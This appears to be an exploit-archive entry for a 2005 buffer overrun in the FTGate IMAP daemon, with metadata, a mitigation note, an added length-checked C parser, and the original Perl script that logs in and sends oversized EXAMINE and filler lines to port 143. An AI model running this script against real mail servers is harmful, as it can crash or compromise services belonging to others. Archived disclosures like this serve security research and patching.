Vendor: Imapd
By: Luca Ercoli
CVSS: 7.5 (HIGH)
Buffer Overrun
CWE: 120 (Buffer Copy without Checking Size of Input)
Product Name: Imapd
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

FTGate Imapd BufferOverrun

This exploit targets a buffer overrun vulnerability in FTGate Imapd. It uses IO::Socket to connect to the host on port 143, logs in, and sends an EXAMINE command carrying a malicious payload of 224 bytes, followed by a line of 11305 bytes of "C" characters. This causes a buffer overflow and allows the attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of FTGate Imapd.
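
The description above attributes the overrun to a copy made without checking the size of the input (CWE-120). The following added example, which is not FTGate's code and not part of the original entry, shows a length-checked parser for a tagged EXAMINE line. `parse_examine`, `LINE_CAP` and `MAILBOX_CAP` are hypothetical names with assumed limits, and the mailbox is treated as the raw remainder of the line (no quoted strings or literals).

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define LINE_CAP    8192  /* assumed per-line limit, not an FTGate value */
#define MAILBOX_CAP 256   /* assumed destination buffer size */

enum verdict { V_OK, V_LINE_TOO_LONG, V_BAD_SYNTAX, V_ARG_TOO_LONG };

/* Parse "<tag> EXAMINE <mailbox>" (CRLF already stripped) into mailbox[].
 * Every length is checked before a byte is copied; over-long input is
 * rejected rather than truncated. */
enum verdict parse_examine(const char *line, size_t len, char mailbox[MAILBOX_CAP])
{
    static const char kw[] = "EXAMINE ";
    const size_t kwlen = sizeof kw - 1;

    mailbox[0] = '\0';
    if (len > LINE_CAP)
        return V_LINE_TOO_LONG;              /* refuse before parsing */

    const char *sp = memchr(line, ' ', len); /* space that ends the tag */
    if (sp == NULL || sp == line)
        return V_BAD_SYNTAX;

    const char *cmd = sp + 1;
    size_t rest = len - (size_t)(cmd - line);
    if (rest <= kwlen)
        return V_BAD_SYNTAX;                 /* no command or no argument */
    for (size_t i = 0; i < kwlen; i++)       /* IMAP commands are case-insensitive */
        if (toupper((unsigned char)cmd[i]) != kw[i])
            return V_BAD_SYNTAX;

    size_t arg_len = rest - kwlen;
    if (arg_len >= MAILBOX_CAP)
        return V_ARG_TOO_LONG;               /* the check a CWE-120 copy omits */
    memcpy(mailbox, cmd + kwlen, arg_len);
    mailbox[arg_len] = '\0';
    return V_OK;
}

int main(void)
{
    char line[16384], box[MAILBOX_CAP];
    /* Constructed input: same shape as the oversized second line on this page. */
    memset(line, 'C', 11305);
    printf("verdict=%d\n", parse_examine(line, 11305, box));
    return 0;
}
```

With these assumed limits the 224-byte argument fits the bounded buffer and is copied safely, while the 11305-byte line is refused before any parsing takes place.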

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;

print "\nFTGate Imapd BufferOverrun\nLuca Ercoli io\@lucaercoli.it\n";
print "http://www.lucaercoli.it\n\n\n";

$host = "localhost";

$remote = IO::Socket::INET->new ( Proto    => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => "143",
                                );

unless ($remote) { die "Can't connect to $host" }

print "[!] Connected\n";
print "[?] Exploiting...\n";

sleep(1);

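# Log in first; EXAMINE is only accepted in the authenticated state
my $imapd = join ("", "1 login user pass", "\r\n");

print $remote $imapd;

sleep(1);
# EXAMINE with a 224-byte mailbox argument
$imapd = join ("", "1 EXAMINE ", "B"x(224), "\r\n");
print $remote $imapd;
sleep(1);
# Followed by a single line of 11305 bytes
$imapd = join ("","C"x(11305), "\r\n");
print $remote $imapd;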

print "\n[!] Done\n\n\n";

close $remote;

# milw0rm.com [2005-11-16]